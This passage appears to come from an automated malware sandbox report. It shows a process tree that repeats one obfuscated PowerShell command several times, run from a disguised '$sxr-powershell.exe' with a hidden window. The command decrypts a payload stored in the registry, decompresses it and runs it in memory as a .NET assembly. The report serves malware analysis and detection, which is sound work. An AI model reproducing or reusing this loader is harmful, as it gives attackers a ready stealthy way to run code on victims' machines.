'')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        
        PID:4736
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        
        PID:2616
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4308).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        19⤵
        Hide Artifacts: Hidden Window
        
        PID:1144
        
        C:\Windows\system32\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4308" "3040" "2948" "3044" "0" "0" "3048" "0" "0" "0" "0" "0"
        19⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3096
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4944).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        18⤵
        
        PID:2392
        
        C:\Windows\$sxr-powershell.exe
        
